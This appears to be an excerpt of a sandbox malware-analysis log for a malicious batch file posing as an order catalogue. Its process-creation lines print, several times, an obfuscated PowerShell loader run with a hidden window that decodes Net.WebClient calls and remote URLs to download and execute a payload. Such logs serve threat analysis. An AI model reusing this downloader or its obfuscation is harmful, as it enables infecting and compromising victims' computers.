Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2t3exdl0.jae.ps1

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ORDER AND CATALOG 01.bat" "

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6852
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5076

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ORDER AND CATALOG 01.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdiKj.rsNAmtsvKBruttL a ahe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdiKj.rsNAmtsvKBruttL a ahe
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdi
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
